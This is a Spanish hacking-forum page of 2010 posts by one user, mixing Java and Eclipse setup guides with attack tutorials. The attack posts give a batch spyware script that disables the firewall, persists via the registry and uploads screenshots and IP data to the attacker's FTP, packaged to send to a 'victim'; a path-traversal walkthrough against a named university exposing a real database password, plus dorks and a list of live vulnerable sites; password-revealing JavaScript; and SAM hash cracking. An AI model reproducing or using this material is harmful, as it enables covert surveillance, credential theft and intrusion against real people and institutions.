Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Devilboy

Páginas 1 ... 11 12 13
#241
Hacking / Hackeando con PHP
Julio 16, 2010, 11:21:55 AM
Bueno en este tuto les enseñaré solo lo básico de esta tecnica.

Si kieren poder usar todo su poder deben saber php y usar su imaginación.

El truco consiste solamente en escribir un codigo php y convertirlo en .exe

para esto necesitamos una herramienta llamada bamcompile: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Nos descargámos el archivo y lo extraemos en algúna carpeta ya ke este programa funciona desde la linea de comandos.


Inicio-ejecutar-cmd

Código: text
cd C:\Documents and Settings\Devilboy\Escritorio\bam


y para usarlo el comando es este:

Código: text
bamcompile.exe archivo.php archivo.exe


nos mostrará algo como esto:

Código: text
Bambalam PHP EXE Compiler/Embedder

Mainfile: archivo.php
Outfile: archivo.exe

Encoding and embedding archivo.php

archivo.exe created successfully!


Ahora un ejemplo, creamos el archivo.php con este code:

Código: text
<?php

    $control = fopen("miarchivo.txt","w+");  
    if($control == false){  
      die("No se ha podido crear el archivo.");  
   }  

fwrite($control,"ssssssssssssssssssssssssssssss");

?>


y repetimos el comando:

Código: text
bamcompile.exe archivo.php archivo.exe


y ejecutámos el archivo.exe, despues de unos segundo se nos crea el archivo.txt.

pero, ¿xq se ve la pantalla de ms-dos al ejecutar el .exe?

Bueno solo agreguémos -w al crear el archivo:

Código: text
bamcompile.exe -w archivo.php archivo.exe


Ahora ejecutamos de nuevo y vemos ke la pantalla ya no aparece xD

Bueno esto solo ha sido una introducción ya ke se puede usar para muchas cosas lindas, les voy a dar unas ideas.

-Para pharming, con un code muy simple se puede cambiar el archivo host
-Para hacer un downloader, osea subir nuestro server en un host ftp y con php hacer ke se descargue y se ejecute
-para hacer un uploader, a diferencia del anterios es ke este subiria a nuestro host ftp la info ke kisieramos de la makina victima
etc, pero eso ya depende de uds

Espero les haya gustado este intro

salu2

Devilboy
#242
Python / Re:Escaner LAN
Julio 09, 2010, 07:02:01 PM
kedarìa mas lindo asi man
#243
Python / Re:Escaner LAN
Julio 09, 2010, 06:57:06 PM
ta lindo pero veo ke pusiste esto:

Código: text
ip = "192.168.0.



ke pasa si me rango de ip empieza con 193.x.x.x.x

el code ya no funcaría o me ekivoco?
#244
Hacking / Descubrir Contraseñas Ocultas Por Asteriscos del Navegador Firefox
Julio 05, 2010, 04:27:20 PM
si tienes acceso a una pc y tiene guardada la contraseña de algun sitio, solo peguen este code en la url y listo

Código: text
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Contraseñas:\n\n" + s); else alert("No hay contraseñas en esta página.");})();
#245
Bugs y Exploits / Arbytrary downloader. [ TEXT ] By xBlacK
Julio 05, 2010, 02:25:28 PM
Es una temprana noche lluviosa de domingo... ajajaja da un chingo de hueva no tener lana y no poder salir asi que decidi hacer un pequeño text.

Bien, a los que no saben que es esta vulnerabilidad les caera de perlas.


Arbitrary downloader a mi forma de verlo es una web-vulnerability muy ... atractiva, ya que los administradores de las webs solo checan que se bajen archivos de su servidor... pero nunca revisan cuantos se pueden bajar jejeje.

Utlizare un ejemplo real para que puedan entenderlo: (al final estan dorks que pueden usar)

Universidad Federal Rural de Pernambuco:

Código: text
www.ufrpe.br/aci/download.php?endArquivo=

vemos que al pegar la URL en nuestro navegador nos lanza una descarga llamada "arquivos"...

TIP: esto quiere decir que en el archivo download.php esta configurado para que baje los archivos de la carpeta "arquivos". por lo que nuestra inyeccion en la url seria asi:

Código: text
www.ufrpe.br/aci/download.php?endArquivo=../download.php



y voala :P nos aparecera el archivo "download.php" para descargasnolo y leer que es lo que tiene...

sigamos con lo interesante... para que quiero el archivo download? si nomas hace que descarge cosas... Bien, en algunos "downloads" requieren de la conexion a la base de datos para saber el id del archivo... por lo que aparecera un requere o un include en el download... pero bueno solo es por si las dudas...

en este caso nuestro codigo es el siguiente:

Código: text
<?
	$strBrowser = $_SERVER['HTTP_USER_AGENT'];
	if (preg_match('/MSIE 5.5/',$strBrowser) || preg_match('/MSIE 6.0/',$strBrowser)) {
	$compMime = "application/download";
	}else{
	$compMime = "application/download";
	}


	$strNomeArquivo = "arquivos/".$_GET['endArquivo'];
 	header("Pragma: public");
     header("Expires: 0"); // set expiration time
     header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
     header("Content-Type: application/force-download");
     header("Content-Type: application/download");
     header("Content-Type: text/plain");
	 header("Content-Disposition: attachment; filename=".basename(str_replace(" ","_",$strNomeArquivo)).";");     
     header("Content-Transfer-Encoding: binary");
     header("Content-Length: ".filesize($strNomeArquivo));
     readfile("$strNomeArquivo");
?>




no existe mas que la configuracion y validacion de los archivos a descargar... no me metere a explicarlo porque la idea es dar una idea abierta a esta vulnerabilidad.

vemos la pagina que tenemos de ejemplo: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

dames en el boton "home" o "inicio" y vemos que en la URL nos aparece /index.php

Vamos por ese archivo a nuestra url de descarga asi:

Código: text
www.ufrpe.br/aci/download.php?endArquivo=../index.php



lo abrimos, checamos y en la cabecera vemos que incluye otro archivo... template.php

Código: text
<?php $home=true;
$menu_on = 'index';
include_once('template.php'); ?>



vamos por el...

Código: text
www.ufrpe.br/aci/download.php?endArquivo=../template.php



vemos, revisamos y vemos que ahi tiene un include interesante:
includes/init.inc.php

Código: text
<? 
include_once("includes/init.inc.php");
$idiomaTemplate = _COOKIE_IDIOMA;
$idiomaTemplate = "";

?>




ahora toca a includes/init.inc.php ser parte de nuestra coleccion...

Código: text
www.ufrpe.br/aci/download.php?endArquivo=../includes/init.inc.php



en el encontraremos otro archivito jajajaja, cansado? a veces es laborioso buscar los archivos... pero bueno juro que el proximo es el ultimo.

abrimos y vemos que incluye:../includes/conexao.php

   
Código: text
include_once("../includes/conexao.php");



nos lo bajamos con la siguiente url:

Código: text
www.ufrpe.br/aci/download.php?endArquivo=../../includes/conexao.php



y voala... tendremos lo maravilloso que hace a las bases de datos:

Código: text
<?
	$dbConn = pg_connect("host=localhost port=5432 user=webuser password=DMv@19,% dbname=webufrpedb")or die("erro");
	
?>


Host: localhost (si tiene localhost puede que tenga un gestor de administracion como pgpmyadmin, phpmyadmin, etc..)

user: webuser

contraseña: DMv@19,%



Ahora solo les quedara buscar como logearse y dependiendo de su criterio subir una shell por medio del mismo gestor, o buscar el login y pass del administrador y logearse y hacer lo que se les de la gana...

Espero haber dado una idea clara a aquellos que no conocian esta vulnerabilidad, o que comienzan en el hack.

Código: text
dorks:
[*] = com, net, org, etc...
[**]= tipo de archivos doc, psd, pdf, pps, etc...

allinurl:[*] "download.php" [**]
allinurl:[*] "downloads.php" [**]
allinurl:[*] "descargas.php" [**]
allinurl:[*] "descargar.php" [**]
allinurl:[*] "descarga.php" [**]
allinurl:[*] "bajar.php" [**]
allinurl:[*] "force-download.php" [**]



algunas webs vulnerables:

www.redalimentaria.com/archivos/descarga.php?id=
media.eleconomista.com.mx/contenido/pdf/descarga.php?file=
www.aoaxaca.com/descarga.php?f=
www.colibrimty.com/descarga.php?file=
www.probecarios.com/descarga.php?file=
phytomedicamenta.com/descarga.php?
www.asambleaapostolicamexico.com/descarga.php?tipo=
www.latinpowermusic.com.mx/datos/boletin/c18/descarga.php?a=
www.plenumsoft.com/download.php?file=
www.miempaque.com/download.php?Archivo=
factum-marketing.com/download.php?file=
deimaginaria.com/download.php?file=
coripa.com.ar/download.php?t=
everdaguer.com/pares/docs/download.php?file=
steelpool.com/download.php?id=
licitaciones.iplan.com.ar/download.php?id=
trenesenescala.com/descargas/download.php?f=
marlenadeblasi.com/download.php?doc=
cvarbitraje.com/force-download.php?file=
cayetanogutierrez.com/download.php?doc=
medicamail.com/download.php?file=
soraya.com/download.php?download=
municipioiquique.com/doc/download.php?link=
marcosrosenzvaig.com.ar/download.php?archivo=
camara-comercio.com/download.php?file=required/connect.php
rodrigomatarrita.com/inc/download.php?file=

Fuente:DDLR

#246
GNU/Linux / Re:Eclipse en ubuntu y derivados
Junio 23, 2010, 06:29:02 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Disculpa Devilboy me podrías decir para que sirve el eclipse? disculpa mi ignorancia  ;D

Lo siento, ya modifiké el post para aclarar eso.

Pero te comento ke eclipse es un ide para programar en java, algo asi como JCreator o el mismo netbeens
#247
GNU/Linux / Eclipse en ubuntu y derivados
Junio 22, 2010, 10:18:21 PM


Eclipse: un IDE de programación en Java

Para instalar Eclipse y Java en Ubuntu ejecutamos el siguiente comando en la terminal:

   
Código: text
 sudo apt-get install eclipse sun-java6-jdk


Esto descargará de Internet los paquetes requeridos y los instalará en tu computadora, pero Eclipse se ejecutara muy lento, esto es debido a que estará haciendo uso de la versión GNU de Java en lugar de la oficial de Sun, para corregir esto introducimos el comando:

   
Código: text
sudo update-java-alternatives -s java-6-sun


Ahora, editamos el archivo de configuración JVM (Java Virtual Machine)

 
Código: text
  sudo -b gedit /etc/jvm


Y agregamos la siguiente línea al principio del archivo:

 
Código: text
  /usr/lib/jvm/java-6-sun


Existe un bug (fallo) en Eclipse que ignora la configuración java-common de Ubuntu (bug 45347); para evitarlo tenemos que editar el archivo java_home de Eclipse:

 
Código: text
  sudo -b gedit /etc/eclipse/java_home


Y agregar al principio del archivo la línea:

 
Código: text
  /usr/lib/jvm/java-6-sun


Por último, si tienes mucha memoria RAM quizá quieras incrementar el tamaño de la pila (precaución: si incrementas este valor demasiado partes de Eclipse estarán constantemente leyendo la swap), la configuración puede ser alterada editando el archivo eclipse.ini:


Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
   
Código: text
 sudo -b gedit /usr/lib/eclipse/eclipse.ini
#248
Hacking / Re:Video tutorial bypass logins en flash
Mayo 18, 2010, 11:46:53 PM
lindo el video pero esto solo funcionario si el login no usa una bd´s o me ekivoco?
#249
Hacking / Ocultar pantalla de ms-dos (batch)
Mayo 18, 2010, 11:35:12 PM


Uno de los problemas a la hora de programar en batch es ke siempre se ve la consola de ms-dos, si le mandamos el batch a la victima y esta ve la consola es obvio ke va a cerrarla, matando nuestro programa en batch, bueno con este code lo ke hacemos es ocultar esa consola de ms-dos

bueno les dejo el code y les explico ke hace

set cmd = createobject("wscript.shell")
Set shell = CreateObject("Scripting.FileSystemObject")
dta=" @echo off"&vbcrlf& _
"%c:\windows\system32%"&vbcrlf& _
""
cmd.run "nombre_de_su_bat.bat", vbHide

1)Copien ese code y peguenlo en el bloc de notas.

2)Cambien donde dice (nombre_de_su_bat.bat) por algun nombre ke kieran.

3)Guarden el code como: loquesea.vbs

4)Hagan el bat ke kieran y guardenlo con el mismo nombre del paso 2

ahora el paso sig en crear un autoextraible con winrar (el mejor joiner a mi punto de vista e indetectable)

manden a su victima el rar y listo, nuestra consola del bat no se verá

cualquier duda me avisan

salu2

Devilboy
#250
Hacking / Pantalla remota con nircmd
Mayo 18, 2010, 11:32:32 PM
Este code lo ke hace es tomar cada cierto tiempo una pantalla de el escritorio de la victima y subirla a nuestro ftp, para ke podamos ver lo ke hace jejjejee, ademas nos sube la ip de la victima,

Bueno usando nircmd y un poco de batch y vbs

Código: text
net stop "Security Center"
net stop SharedAccess
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v oscar /d c:\windows\system32\inetcpe.vbs
:inicio
cd C:\windows\system32\
ipconfig /all > C:\windows\system32\Win32sys2.txt
echo USER USER DE TU FTP > C:\windows\system32\Win32sys.txt
echo PASS DE TU FTP >> C:\windows\system32\Win32sys.txt
echo put C:\windows\system32\Win32sys2.txt >> C:\windows\system32\Win32sys.txt
nircmdc.exe savescreenshot imagen.jpg
echo put C:\windows\system32\imagen.jpg >> C:\windows\system32\Win32sys.txt
echo bye >> C:\windows\system32\\Win32sys.txt
ftp -n -s:c:C:\windows\system32\Win32sys.txt AKI TU FTP
ping -n AKI EL TIEMPO KE KERAMOS localhost > nul
goto inicio


copiamos y pegamos este code en un bloc de notas
y lo guardamos como lokesea.bat obviamente reemplazando lokesea por algun nombre.

uso el code de esconder consola ke publike antes

ahora paso a explicar un poco el code

las primeras lineas lo ke hace es matar el firewall de windows

despues agrega al registro para ke se ejecute cada vez ke la victima encienda su pc

luego creamos un bucle para ke tomela foto cada cierto tiempo

seguido sube la imagen a nuetsro ftp y listo

asi podrémos ver lo ke hace nuestra victima jejej

Bueno para usarlo solo cambien donde dice:

USER DE TU FTP, PASS DE TU FTP, A KI TU FTP Y AKI EL TIEMPO KE KERÁMOS

junten su bat el vbs y el nircmd con el winrar para crear un autoextraible.

no enseñaré eso a ki pero es muy facil de hacer

y es todo

espero les haya gustado

cualkier duda comenten
#251
Hacking / Meterpreter: disable-mouse/keyboard & cmd & VNC
Mayo 16, 2010, 12:43:30 PM
aquí les dejo este vídeo donde explico algunas funciones de meterpreter. entre ellas, como des habilitar el teclado y el mouse de la pc victima,obtener una shell de windows (cmd) y una sesión de VNC.


tuto por: DarkSpark
fuente: ddlr
#252
Dudas y pedidos generales / Re:¿Se puede aumentar tu linea de internet?
Abril 29, 2010, 11:06:44 AM
si se puede.

Esto se le llama uncapp.

Uncapp significa que haciendole unas modificaciones a nuestro modem y consiguiendo mac address con velocidad superior a la nuestra, se obtiene una mayor velocidad.

Kiero decirte ke el uncapp no se le puede hacer a todos los modems y no todos los isp`s aceptan esto.

salu2
#253
Phreak / Web que ofrecen SMS gratis
Abril 14, 2010, 03:05:35 PM
Bueno esta web trae a muchos paises, yo ya lo probè en mi cel y el dia de hoy funca muy bien y muy rapido
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

aki otra ke probé hace unos dias y tmb funca solo ke aveces hay mucha gente
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Una ke llega sin spam, tmb probada por mi
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Esta me parece ke funciona como la anterior o tal ves serà la misma xD
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Esta funca muy bien pero con spam
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

si encuentro mas las posteo aki

Nota: obvio llegan con un poco de spam de las webs pero sacan de apuros  ;D
#254
Desarrollo y modificación de malwares / Re: Metodo Arabe privado (ahora publico por su autor)server Bifrost fud
Abril 13, 2010, 04:22:40 PM
No me funca.

casi al final una tool me rompe el server
#255
Desarrollo y modificación de malwares / Re: Metodo Arabe privado (ahora publico por su autor)server Bifrost fud
Abril 13, 2010, 11:33:10 AM
me pide pass

cual es
#256
Java / Re:Nuestros programas en Java
Abril 04, 2010, 03:32:58 PM
Aqui otro muy sencillo, calcula el mayor y menor numeros de un arreglo usando Poo

Código: java
class Prueba{
	

	 int mayor(int x[]){
		int m=x[0];
		 
			for(int i=0;i<x.length;i++){
				
				if(x[i]>m)m=x[i];
				
				
			}

		 return m;
		
		 
		 
	 }
	 
	 
	 
	 int menor(int x[]){
			int m=x[0];
			 
				for(int i=0;i<x.length;i++){
					
					if(x[i]<m)m=x[i];
					
					
				}

			 return m;
			
			 
			 
		 }
	 
	 
	

}

public class Poo{
	
	public static void main(String args[]){
		
		int array[]={133,88,3,4,5};
		
		
		
	Prueba prueba=new Prueba();
	
	System.out.println("el mayor es: "+prueba.mayor(array)+"\nY el Menor es: "+prueba.menor(array));
	
	
	}
	
	
}


La salida es esta:

el mayor es: 133
Y el Menor es: 3
#257
Java / Configurar J2ME en Eclipse
Marzo 24, 2010, 11:08:27 AM
Bueno en este tuto les enseñaré como instalar y usar J2ME en Eclipse.

J2ME (Java 2 Micro Edition)  es la tecnología de java para programar aplicaciones para celular (MIDlets), ya sea desde programas como el famoso Hola mundo, calendarios, graficas hasta juegos de video.

J2ME cuenta con su propio compilador llamado Java Wirelles Toolkit, lo ke hacemos con este compilador es:

1)escribir nuestro code (MIDlet) desde cualkier editor de texto plano como bloc de notas o wordpad
2)guardamos este midlet en la carpeta src donde instalamos el wirelles toolkit
3)lo compilamos

es una tarea algo tediosa por eso ocuparémos Eclipse, que para mi es el mejor IDE para programacioón en java.

Bueno empecemos bajando todo lo ke necesitamos

1) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

2) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

3) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

4) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

1) Iniciamos la instalacion del J2SDK





2)Instalamos el Eclipse

3) Instalamos el Wirelles Toolkit en la carpeta c:/wtk25


4)Configuracion del Eclipse: Iniciamos Eclipse, damos en la pestaña Help-software update-Find and Install


seleccionamos Search for new features to install y damos next




Damos click en New remote site
Name: EclipseME Update site
URL: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
clickeamos Ok



Vemos como nuestro nuevo sitio se ha agregado, lo seleccionamos dando un clic en el y presionamos Finish.

La instalación comenzará, una vez finalizado nos pide ke reiniciemos eclipse lo hacemos y ahora procedemos a configurar el Wirelles Toolkit

5)Nos vamos a la pestaña Window-preferences...


Click en la pestaña J2ME- nos vamos a Browse y seleccionamos nuestra carpeta donde instalamos en wirelles toolkit


Nos vamos a Device Management y pulsamos Import.

En Specify search directory volvemos a poner el directorio de WTK (C:\WTK25) y pulsamos en Refresh. Dejamos marcados todos los nuevos elementos que aparecen.



Nos vamos ahora a Windows -> Preferences -> Java -> Debug y dejamos los valores como en la captura.



y para finalizar nos vamos a la pestaña Java-Build Path y marcamos la opcion Folder



Damos Ok y listo ya tenemos configurado nuestro J2ME en Eclipse

Ahora solo nos keda empezar a programar

Aquí esta una captura del resultado, un simple programa ke muestra de titulo Devilboy y la foto de mi amada



espero ke les haya gustado el tuto y les sirva

Salu2

Devilboy
#258
Ingeniería Inversa / Re:Tutorial Programando Parche en Visual Basic
Marzo 22, 2010, 01:21:49 PM
Lindo tuto man

1+

salu2
#259
Base de Datos / MySQL Workbench
Marzo 18, 2010, 05:23:23 PM



El mejor diseñador de bases de datos mysql, creado por sun.
Sirve para diseñar nuestra bd´s de manera grafica y posteriormente exportarla como codigo sql


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#260
Hacking / Crackear password de administrador en windows usando Backtrack 3
Marzo 10, 2010, 11:40:03 AM
Bueno se ke ya existe mucha info sobre esto, pero bueno un poco mas no hace daño a nadie.
Ademas este tuto va enfocado a los novatos, bueno espero ke les guste y perdonen si no pongo capturas pero lo hice de rapido, ademàs creo ke kedarà muy entendible apesar de no usar imagenes y pues cualkier duda pueden preguntar.

Herramientas:

1)Una pc con windows xp, funciona tmb para versiones mas viejitas, en vista la vdd no se si funcione pues no lo he probado pero me imagino ke si

2)Acceso fisico a la pc

3)Una distribucion de linux, en mi caso usarè mi buen amigo backtrack 3.
Uso backtrack xq ya trae muchas herramientas de crackeo instaladas pero da igual la ke usen

empezàmos por abrir una consola de bt3

y tecleamos lo sig:

Código: text

ls /mnt/hda1


en mi caso es hda1 pero en el de uds puede variar un poco, puede ser sda1, sda2, hda2, etc

y nos desplegarà algo como esto:

Código: text

bt ~ # ls /mnt/hda1
AUTOEXEC.BAT*              IO.SYS*                       boot.ini*
AppServ/                   MSDOS.SYS*                    datos.sql*
Archivos\ de\ programa/    NTDETECT.COM*                 eclipse/
Bootfont.bin*              RECYCLER/                     ntldr*
CONFIG.SYS*                Sun/                          pagefile.sys*
Config.Msi/                System\ Volume\ Information/  xampp/
Documents\ and\ Settings/  WINDOWS/


estos son los archivos ke tengo en mi pc, en mi disco duro C:/, obviamente en el de uds va a cambiar

procedemos a crear una carpeta:

Código: text

mkdir /crack
cd /crack


Ahora ke ya estàmos dentro de /crack

ahora vamos a extraer la boot key y guardarla en un archivo .txt llamado bootkey.txt:

Código: text

bkhive /mnt/hda1/WINDOWS/system32/config/system bootkey.txt


les tiene ke aparecer algo parecido a esto:

Código: text
Bootkey: 5da3c4796d09d5ca929d8498c6af87c9


Ahora vamos a extraer el hash del archivo SAM y guardarlo como hash.txt:

Código: text


samdump2 /mnt/hda1/WINDOWS/system32/config/SAM bootkey.txt >hash.txt


Una vez hecho esto ya tenemos el contenido del archivo SAM que es donde se encuentran los passwords en hash.txt. ahora vamos a crackearlo.

para esto usarèmos un diccionario  y john the ripper

necesitàmos tener el diccionario en la misma carpeta donde estàmos (crack)
recuerden ke un diccionario no es mas ke un archivo de texto ke contiene varias palabras (posibles passwords).

Bien una vez ke ya tenèmos el diccionario (words.txt) tecleamos lo sig para crackear el hash:

Código: text

john hash.txt -f:NT -w:words.txt


y nos darà el password del windows

recordèmos ke si el password no està en el diccionario, pues entonces es imposible crackearlo

por eso para ke este atake funcione necesitamos tener un buen diccionario

cualkier duda aki estoy

salu2

Devilboy

Páginas 1 ... 11 12 13